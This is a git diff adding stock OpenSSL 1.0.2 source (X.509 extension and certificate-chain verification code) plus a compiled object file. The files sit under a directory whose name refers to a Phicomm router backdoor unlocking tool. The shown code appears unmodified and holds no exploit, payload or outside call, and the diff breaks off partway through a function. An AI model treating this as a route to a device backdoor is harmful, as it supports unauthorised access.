+        lastpos = 0;
+    n = sk_X509_EXTENSION_num(sk);
+    for (; lastpos < n; lastpos++) {
+        ex = sk_X509_EXTENSION_value(sk, lastpos);
+        if (OBJ_cmp(ex->object, obj) == 0)
+            return (lastpos);
+    }
+    return (-1);
+}
+
+int X509v3_get_ext_by_critical(const STACK_OF(X509_EXTENSION) *sk, int crit,
+                               int lastpos)
+{
+    int n;
+    X509_EXTENSION *ex;
+
+    if (sk == NULL)
+        return (-1);
+    lastpos++;
+    if (lastpos < 0)
+        lastpos = 0;
+    n = sk_X509_EXTENSION_num(sk);
+    for (; lastpos < n; lastpos++) {
+        ex = sk_X509_EXTENSION_value(sk, lastpos);
+        if (((ex->critical > 0) && crit) || ((ex->critical <= 0) && !crit))
+            return (lastpos);
+    }
+    return (-1);
+}
+
+X509_EXTENSION *X509v3_get_ext(const STACK_OF(X509_EXTENSION) *x, int loc)
+{
+    if (x == NULL || sk_X509_EXTENSION_num(x) <= loc || loc < 0)
+        return NULL;
+    else
+        return sk_X509_EXTENSION_value(x, loc);
+}
+
+X509_EXTENSION *X509v3_delete_ext(STACK_OF(X509_EXTENSION) *x, int loc)
+{
+    X509_EXTENSION *ret;
+
+    if (x == NULL || sk_X509_EXTENSION_num(x) <= loc || loc < 0)
+        return (NULL);
+    ret = sk_X509_EXTENSION_delete(x, loc);
+    return (ret);
+}
+
+STACK_OF(X509_EXTENSION) *X509v3_add_ext(STACK_OF(X509_EXTENSION) **x,
+                                         X509_EXTENSION *ex, int loc)
+{
+    X509_EXTENSION *new_ex = NULL;
+    int n;
+    STACK_OF(X509_EXTENSION) *sk = NULL;
+
+    if (x == NULL) {
+        X509err(X509_F_X509V3_ADD_EXT, ERR_R_PASSED_NULL_PARAMETER);
+        goto err2;
+    }
+
+    if (*x == NULL) {
+        if ((sk = sk_X509_EXTENSION_new_null()) == NULL)
+            goto err;
+    } else
+        sk = *x;
+
+    n = sk_X509_EXTENSION_num(sk);
+    if (loc > n)
+        loc = n;
+    else if (loc < 0)
+        loc = n;
+
+    if ((new_ex = X509_EXTENSION_dup(ex)) == NULL)
+        goto err2;
+    if (!sk_X509_EXTENSION_insert(sk, new_ex, loc))
+        goto err;
+    if (*x == NULL)
+        *x = sk;
+    return (sk);
+ err:
+    X509err(X509_F_X509V3_ADD_EXT, ERR_R_MALLOC_FAILURE);
+ err2:
+    if (new_ex != NULL)
+        X509_EXTENSION_free(new_ex);
+    if (sk != NULL)
+        sk_X509_EXTENSION_free(sk);
+    return (NULL);
+}
+
+X509_EXTENSION *X509_EXTENSION_create_by_NID(X509_EXTENSION **ex, int nid,
+                                             int crit,
+                                             ASN1_OCTET_STRING *data)
+{
+    ASN1_OBJECT *obj;
+    X509_EXTENSION *ret;
+
+    obj = OBJ_nid2obj(nid);
+    if (obj == NULL) {
+        X509err(X509_F_X509_EXTENSION_CREATE_BY_NID, X509_R_UNKNOWN_NID);
+        return (NULL);
+    }
+    ret = X509_EXTENSION_create_by_OBJ(ex, obj, crit, data);
+    if (ret == NULL)
+        ASN1_OBJECT_free(obj);
+    return (ret);
+}
+
+X509_EXTENSION *X509_EXTENSION_create_by_OBJ(X509_EXTENSION **ex,
+                                             ASN1_OBJECT *obj, int crit,
+                                             ASN1_OCTET_STRING *data)
+{
+    X509_EXTENSION *ret;
+
+    if ((ex == NULL) || (*ex == NULL)) {
+        if ((ret = X509_EXTENSION_new()) == NULL) {
+            X509err(X509_F_X509_EXTENSION_CREATE_BY_OBJ,
+                    ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+    } else
+        ret = *ex;
+
+    if (!X509_EXTENSION_set_object(ret, obj))
+        goto err;
+    if (!X509_EXTENSION_set_critical(ret, crit))
+        goto err;
+    if (!X509_EXTENSION_set_data(ret, data))
+        goto err;
+
+    if ((ex != NULL) && (*ex == NULL))
+        *ex = ret;
+    return (ret);
+ err:
+    if ((ex == NULL) || (ret != *ex))
+        X509_EXTENSION_free(ret);
+    return (NULL);
+}
+
+int X509_EXTENSION_set_object(X509_EXTENSION *ex, ASN1_OBJECT *obj)
+{
+    if ((ex == NULL) || (obj == NULL))
+        return (0);
+    ASN1_OBJECT_free(ex->object);
+    ex->object = OBJ_dup(obj);
+    return (1);
+}
+
+int X509_EXTENSION_set_critical(X509_EXTENSION *ex, int crit)
+{
+    if (ex == NULL)
+        return (0);
+    ex->critical = (crit) ? 0xFF : -1;
+    return (1);
+}
+
+int X509_EXTENSION_set_data(X509_EXTENSION *ex, ASN1_OCTET_STRING *data)
+{
+    int i;
+
+    if (ex == NULL)
+        return (0);
+    i = M_ASN1_OCTET_STRING_set(ex->value, data->data, data->length);
+    if (!i)
+        return (0);
+    return (1);
+}
+
+ASN1_OBJECT *X509_EXTENSION_get_object(X509_EXTENSION *ex)
+{
+    if (ex == NULL)
+        return (NULL);
+    return (ex->object);
+}
+
+ASN1_OCTET_STRING *X509_EXTENSION_get_data(X509_EXTENSION *ex)
+{
+    if (ex == NULL)
+        return (NULL);
+    return (ex->value);
+}
+
+int X509_EXTENSION_get_critical(X509_EXTENSION *ex)
+{
+    if (ex == NULL)
+        return (0);
+    if (ex->critical > 0)
+        return 1;
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_v3.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_v3.o
new file mode 100644
index 0000000000000000000000000000000000000000..94915c645a56c02fd7c1d29d0daee97eef88dc39
GIT binary patch
literal 5368
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vfy.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vfy.c
new file mode 100644
index 0000000..1196a2a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vfy.c
@@ -0,0 +1,2391 @@
+/* crypto/x509/x509_vfy.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include <errno.h>
+
+#include "cryptlib.h"
+#include <openssl/crypto.h>
+#include <openssl/lhash.h>
+#include <openssl/buffer.h>
+#include <openssl/evp.h>
+#include <openssl/asn1.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/objects.h>
+#include "vpm_int.h"
+
+/* CRL score values */
+
+/* No unhandled critical extensions */
+
+#define CRL_SCORE_NOCRITICAL    0x100
+
+/* certificate is within CRL scope */
+
+#define CRL_SCORE_SCOPE         0x080
+
+/* CRL times valid */
+
+#define CRL_SCORE_TIME          0x040
+
+/* Issuer name matches certificate */
+
+#define CRL_SCORE_ISSUER_NAME   0x020
+
+/* If this score or above CRL is probably valid */
+
+#define CRL_SCORE_VALID (CRL_SCORE_NOCRITICAL|CRL_SCORE_TIME|CRL_SCORE_SCOPE)
+
+/* CRL issuer is certificate issuer */
+
+#define CRL_SCORE_ISSUER_CERT   0x018
+
+/* CRL issuer is on certificate path */
+
+#define CRL_SCORE_SAME_PATH     0x008
+
+/* CRL issuer matches CRL AKID */
+
+#define CRL_SCORE_AKID          0x004
+
+/* Have a delta CRL with valid times */
+
+#define CRL_SCORE_TIME_DELTA    0x002
+
+static int null_callback(int ok, X509_STORE_CTX *e);
+static int check_issued(X509_STORE_CTX *ctx, X509 *x, X509 *issuer);
+static X509 *find_issuer(X509_STORE_CTX *ctx, STACK_OF(X509) *sk, X509 *x);
+static int check_chain_extensions(X509_STORE_CTX *ctx);
+static int check_name_constraints(X509_STORE_CTX *ctx);
+static int check_id(X509_STORE_CTX *ctx);
+static int check_trust(X509_STORE_CTX *ctx);
+static int check_revocation(X509_STORE_CTX *ctx);
+static int check_cert(X509_STORE_CTX *ctx);
+static int check_policy(X509_STORE_CTX *ctx);
+
+static int get_crl_score(X509_STORE_CTX *ctx, X509 **pissuer,
+                         unsigned int *preasons, X509_CRL *crl, X509 *x);
+static int get_crl_delta(X509_STORE_CTX *ctx,
+                         X509_CRL **pcrl, X509_CRL **pdcrl, X509 *x);
+static void get_delta_sk(X509_STORE_CTX *ctx, X509_CRL **dcrl,
+                         int *pcrl_score, X509_CRL *base,
+                         STACK_OF(X509_CRL) *crls);
+static void crl_akid_check(X509_STORE_CTX *ctx, X509_CRL *crl, X509 **pissuer,
+                           int *pcrl_score);
+static int crl_crldp_check(X509 *x, X509_CRL *crl, int crl_score,
+                           unsigned int *preasons);
+static int check_crl_path(X509_STORE_CTX *ctx, X509 *x);
+static int check_crl_chain(X509_STORE_CTX *ctx,
+                           STACK_OF(X509) *cert_path,
+                           STACK_OF(X509) *crl_path);
+
+static int internal_verify(X509_STORE_CTX *ctx);
+const char X509_version[] = "X.509" OPENSSL_VERSION_PTEXT;
+
+static int null_callback(int ok, X509_STORE_CTX *e)
+{
+    return ok;
+}
+
+#if 0
+static int x509_subject_cmp(X509 **a, X509 **b)
+{
+    return X509_subject_name_cmp(*a, *b);
+}
+#endif
+/* Return 1 is a certificate is self signed */
+static int cert_self_signed(X509 *x)
+{
+    X509_check_purpose(x, -1, 0);
+    if (x->ex_flags & EXFLAG_SS)
+        return 1;
+    else
+        return 0;
+}
+
+/* Given a certificate try and find an exact match in the store */
+
+static X509 *lookup_cert_match(X509_STORE_CTX *ctx, X509 *x)
+{
+    STACK_OF(X509) *certs;
+    X509 *xtmp = NULL;
+    int i;
+    /* Lookup all certs with matching subject name */
+    certs = ctx->lookup_certs(ctx, X509_get_subject_name(x));
+    if (certs == NULL)
+        return NULL;
+    /* Look for exact match */
+    for (i = 0; i < sk_X509_num(certs); i++) {
+        xtmp = sk_X509_value(certs, i);
+        if (!X509_cmp(xtmp, x))
+            break;
+    }
+    if (i < sk_X509_num(certs))
+        CRYPTO_add(&xtmp->references, 1, CRYPTO_LOCK_X509);
+    else
+        xtmp = NULL;
+    sk_X509_pop_free(certs, X509_free);
+    return xtmp;
+}
+
+int X509_verify_cert(X509_STORE_CTX *ctx)
+{
+    X509 *x, *xtmp, *chain_ss = NULL;
+    int bad_chain = 0;
+    X509_VERIFY_PARAM *param = ctx->param;
+    int depth, i, ok = 0;
+    int num;
+    int (*cb) (int xok, X509_STORE_CTX *xctx);
+    STACK_OF(X509) *sktmp = NULL;
+    if (ctx->cert == NULL) {
+        X509err(X509_F_X509_VERIFY_CERT, X509_R_NO_CERT_SET_FOR_US_TO_VERIFY);
+        return -1;
+    }
+
+    cb = ctx->verify_cb;
+
+    /*
+     * first we make sure the chain we are going to build is present and that
+     * the first entry is in place
+     */
+    if (ctx->chain == NULL) {
+        if (((ctx->chain = sk_X509_new_null()) == NULL) ||
+            (!sk_X509_push(ctx->chain, ctx->cert))) {
+            X509err(X509_F_X509_VERIFY_CERT, ERR_R_MALLOC_FAILURE);
+            goto end;
+        }
+        CRYPTO_add(&ctx->cert->references, 1, CRYPTO_LOCK_X509);
+        ctx->last_untrusted = 1;
+    }
+
+    /* We use a temporary STACK so we can chop and hack at it */
+    if (ctx->untrusted != NULL
+        && (sktmp = sk_X509_dup(ctx->untrusted)) == NULL) {
+        X509err(X509_F_X509_VERIFY_CERT, ERR_R_MALLOC_FAILURE);
+        goto end;
+    }
+
+    num = sk_X509_num(ctx->chain);
+    x = sk_X509_value(ctx->chain, num - 1);
+    depth = param->depth;
+
+    for (;;) {
+        /* If we have enough, we break */
+        if (depth < num)
+            break;              /* FIXME: If this happens, we should take
+                                 * note of it and, if appropriate, use the
+                                 * X509_V_ERR_CERT_CHAIN_TOO_LONG error code
+                                 * later. */
+
+        /* If we are self signed, we break */
+        if (cert_self_signed(x))
+            break;
+        /*
+         * If asked see if we can find issuer in trusted store first
+         */
+        if (ctx->param->flags & X509_V_FLAG_TRUSTED_FIRST) {
+            ok = ctx->get_issuer(&xtmp, ctx, x);
+            if (ok < 0)
+                return ok;
+            /*
+             * If successful for now free up cert so it will be picked up
+             * again later.
+             */
+            if (ok > 0) {
+                X509_free(xtmp);
+                break;
+            }
+        }
+
+        /* If we were passed a cert chain, use it first */
+        if (ctx->untrusted != NULL) {
+            xtmp = find_issuer(ctx, sktmp, x);
+            if (xtmp != NULL) {
+                if (!sk_X509_push(ctx->chain, xtmp)) {
+                    X509err(X509_F_X509_VERIFY_CERT, ERR_R_MALLOC_FAILURE);
+                    goto end;
+                }
+                CRYPTO_add(&xtmp->references, 1, CRYPTO_LOCK_X509);
+                (void)sk_X509_delete_ptr(sktmp, xtmp);
+                ctx->last_untrusted++;
+                x = xtmp;
+                num++;
+                /*
+                 * reparse the full chain for the next one
+                 */
+                continue;
+            }
+        }
+        break;
+    }
+
+    /*
+     * at this point, chain should contain a list of untrusted certificates.
+     * We now need to add at least one trusted one, if possible, otherwise we
+     * complain.
+     */
+
+    /*
+     * Examine last certificate in chain and see if it is self signed.
+     */
+
+    i = sk_X509_num(ctx->chain);
+    x = sk_X509_value(ctx->chain, i - 1);
+    if (cert_self_signed(x)) {
+        /* we have a self signed certificate */
+        if (sk_X509_num(ctx->chain) == 1) {
+            /*
+             * We have a single self signed certificate: see if we can find
+             * it in the store. We must have an exact match to avoid possible
+             * impersonation.
+             */
+            ok = ctx->get_issuer(&xtmp, ctx, x);
+            if ((ok <= 0) || X509_cmp(x, xtmp)) {
+                ctx->error = X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT;
+                ctx->current_cert = x;
+                ctx->error_depth = i - 1;
+                if (ok == 1)
+                    X509_free(xtmp);
+                bad_chain = 1;
+                ok = cb(0, ctx);
+                if (!ok)
+                    goto end;
+            } else {
+                /*
+                 * We have a match: replace certificate with store version so
+                 * we get any trust settings.
+                 */
+                X509_free(x);
+                x = xtmp;
+                (void)sk_X509_set(ctx->chain, i - 1, x);
+                ctx->last_untrusted = 0;
+            }
+        } else {
+            /*
+             * extract and save self signed certificate for later use
+             */
+            chain_ss = sk_X509_pop(ctx->chain);
+            ctx->last_untrusted--;
+            num--;
+            x = sk_X509_value(ctx->chain, num - 1);
+        }
+    }
+
+    /* We now lookup certs from the certificate store */
+    for (;;) {
+        /* If we have enough, we break */
+        if (depth < num)
+            break;
+
+        /* If we are self signed, we break */
+        if (cert_self_signed(x))
+            break;
+
+        ok = ctx->get_issuer(&xtmp, ctx, x);
+
+        if (ok < 0)
+            return ok;
+        if (ok == 0)
+            break;
+
+        x = xtmp;
+        if (!sk_X509_push(ctx->chain, x)) {
+            X509_free(xtmp);
+            X509err(X509_F_X509_VERIFY_CERT, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        num++;
+    }
+
+    /* we now have our chain, lets check it... */
+
+    i = check_trust(ctx);
+
+    /* If explicitly rejected error */
+    if (i == X509_TRUST_REJECTED)
+        goto end;
+    /*
+     * If not explicitly trusted then indicate error unless it's a single
+     * self signed certificate in which case we've indicated an error already
+     * and set bad_chain == 1
+     */
+    if (i != X509_TRUST_TRUSTED && !bad_chain) {
+        if ((chain_ss == NULL) || !ctx->check_issued(ctx, x, chain_ss)) {
+            if (ctx->last_untrusted >= num)
+                ctx->error = X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY;
+            else
+                ctx->error = X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT;
+            ctx->current_cert = x;
+        } else {
+
+            sk_X509_push(ctx->chain, chain_ss);
+            num++;
+            ctx->last_untrusted = num;
+            ctx->current_cert = chain_ss;
+            ctx->error = X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN;
+            chain_ss = NULL;
+        }
+
+        ctx->error_depth = num - 1;
+        bad_chain = 1;
+        ok = cb(0, ctx);
+        if (!ok)
+            goto end;
+    }
+
+    /* We have the chain complete: now we need to check its purpose */
+    ok = check_chain_extensions(ctx);
+
+    if (!ok)
+        goto end;
+
+    /* Check name constraints */
+
+    ok = check_name_constraints(ctx);
+
+    if (!ok)
+        goto end;
+
+    ok = check_id(ctx);
+
+    if (!ok)
+        goto end;
+
+    /* We may as well copy down any DSA parameters that are required */
+    X509_get_pubkey_parameters(NULL, ctx->chain);
+
+    /*
+     * Check revocation status: we do this after copying parameters because
+     * they may be needed for CRL signature verification.
+     */
+
+    ok = ctx->check_revocation(ctx);
+    if (!ok)
+        goto end;
+
+    i = X509_chain_check_suiteb(&ctx->error_depth, NULL, ctx->chain,
+                                ctx->param->flags);
+    if (i != X509_V_OK) {
+        ctx->error = i;
+        ctx->current_cert = sk_X509_value(ctx->chain, ctx->error_depth);
+        ok = cb(0, ctx);
+        if (!ok)
+            goto end;
+    }
+
+    /* At this point, we have a chain and need to verify it */
+    if (ctx->verify != NULL)
+        ok = ctx->verify(ctx);
+    else
+        ok = internal_verify(ctx);
+    if (!ok)
+        goto end;
+
+#ifndef OPENSSL_NO_RFC3779
+    /* RFC 3779 path validation, now that CRL check has been done */
+    ok = v3_asid_validate_path(ctx);
+    if (!ok)
+        goto end;
+    ok = v3_addr_validate_path(ctx);
+    if (!ok)
+        goto end;
+#endif
+
+    /* If we get this far evaluate policies */
+    if (!bad_chain && (ctx->param->flags & X509_V_FLAG_POLICY_CHECK))
+        ok = ctx->check_policy(ctx);
+    if (!ok)
+        goto end;
+    if (0) {
+ end:
+        X509_get_pubkey_parameters(NULL, ctx->chain);
+    }
+    if (sktmp != NULL)
+        sk_X509_free(sktmp);
+    if (chain_ss != NULL)
+        X509_free(chain_ss);
+    return ok;
+}
+
+/*
+ * Given a STACK_OF(X509) find the issuer of cert (if any)
+ */
+
+static X509 *find_issuer(X509_STORE_CTX *ctx, STACK_OF(X509) *sk, X509 *x)
+{
+    int i;
+    X509 *issuer;
+    for (i = 0; i < sk_X509_num(sk); i++) {
+        issuer = sk_X509_value(sk, i);
+        if (ctx->check_issued(ctx, x, issuer))
+            return issuer;
+    }
+    return NULL;
+}
+
+/* Given a possible certificate and issuer check them */
+
+static int check_issued(X509_STORE_CTX *ctx, X509 *x, X509 *issuer)
+{
+    int ret;
+    ret = X509_check_issued(issuer, x);
+    if (ret == X509_V_OK)
+        return 1;
+    /* If we haven't asked for issuer errors don't set ctx */
+    if (!(ctx->param->flags & X509_V_FLAG_CB_ISSUER_CHECK))
+        return 0;
+
+    ctx->error = ret;
+    ctx->current_cert = x;
+    ctx->current_issuer = issuer;
+    return ctx->verify_cb(0, ctx);
+}
+
+/* Alternative lookup method: look from a STACK stored in other_ctx */
+
+static int get_issuer_sk(X509 **issuer, X509_STORE_CTX *ctx, X509 *x)
+{
+    *issuer = find_issuer(ctx, ctx->other_ctx, x);
+    if (*issuer) {
+        CRYPTO_add(&(*issuer)->references, 1, CRYPTO_LOCK_X509);
+        return 1;
+    } else
+        return 0;
+}
+
+/*
+ * Check a certificate chains extensions for consistency with the supplied
+ * purpose
+ */
+
+static int check_chain_extensions(X509_STORE_CTX *ctx)
+{
+#ifdef OPENSSL_NO_CHAIN_VERIFY
+    return 1;
+#else
+    int i, ok = 0, must_be_ca, plen = 0;
+    X509 *x;
+    int (*cb) (int xok, X509_STORE_CTX *xctx);
+    int proxy_path_length = 0;
+    int purpose;
+    int allow_proxy_certs;
+    cb = ctx->verify_cb;
+
+    /*-
+     *  must_be_ca can have 1 of 3 values:
+     * -1: we accept both CA and non-CA certificates, to allow direct
+     *     use of self-signed certificates (which are marked as CA).
+     * 0:  we only accept non-CA certificates.  This is currently not
+     *     used, but the possibility is present for future extensions.
+     * 1:  we only accept CA certificates.  This is currently used for
+     *     all certificates in the chain except the leaf certificate.
+     */
+    must_be_ca = -1;
+
+    /* CRL path validation */
+    if (ctx->parent) {
+        allow_proxy_certs = 0;
+        purpose = X509_PURPOSE_CRL_SIGN;
+    } else {
+        allow_proxy_certs =
+            ! !(ctx->param->flags & X509_V_FLAG_ALLOW_PROXY_CERTS);
+        /*
+         * A hack to keep people who don't want to modify their software
+         * happy
+         */
+        if (getenv("OPENSSL_ALLOW_PROXY_CERTS"))
+            allow_proxy_certs = 1;
+        purpose = ctx->param->purpose;
+    }
+
+    /* Check all untrusted certificates */
+    for (i = 0; i < ctx->last_untrusted; i++) {
+        int ret;
+        x = sk_X509_value(ctx->chain, i);
+        if (!(ctx->param->flags & X509_V_FLAG_IGNORE_CRITICAL)
+            && (x->ex_flags & EXFLAG_CRITICAL)) {
+            ctx->error = X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION;
+            ctx->error_depth = i;
+            ctx->current_cert = x;
+            ok = cb(0, ctx);
+            if (!ok)
+                goto end;
+        }
+        if (!allow_proxy_certs && (x->ex_flags & EXFLAG_PROXY)) {
+            ctx->error = X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED;
+            ctx->error_depth = i;
+            ctx->current_cert = x;
+            ok = cb(0, ctx);
+            if (!ok)
+                goto end;
+        }
+        ret = X509_check_ca(x);
+        switch (must_be_ca) {
+        case -1:
+            if ((ctx->param->flags & X509_V_FLAG_X509_STRICT)
+                && (ret != 1) && (ret != 0)) {
+                ret = 0;
+                ctx->error = X509_V_ERR_INVALID_CA;
+            } else
+                ret = 1;
+            break;
+        case 0:
+            if (ret != 0) {
+                ret = 0;
+                ctx->error = X509_V_ERR_INVALID_NON_CA;
+            } else
+                ret = 1;
+            break;
+        default:
+            if ((ret == 0)
+                || ((ctx->param->flags & X509_V_FLAG_X509_STRICT)
+                    && (ret != 1))) {
+                ret = 0;
+                ctx->error = X509_V_ERR_INVALID_CA;
+            } else
+                ret = 1;
+            break;
+        }
+        if (ret == 0) {
+            ctx->error_depth = i;
+            ctx->current_cert = x;
+            ok = cb(0, ctx);
+            if (!ok)
+                goto end;
+        }
+        if (ctx->param->purpose > 0) {
+            ret = X509_check_purpose(x, purpose, must_be_ca > 0);
+            if ((ret == 0)
+                || ((ctx->param->flags & X509_V_FLAG_X509_STRICT)
+                    && (ret != 1))) {
+                ctx->error = X509_V_ERR_INVALID_PURPOSE;
+                ctx->error_depth = i;
+                ctx->current_cert = x;
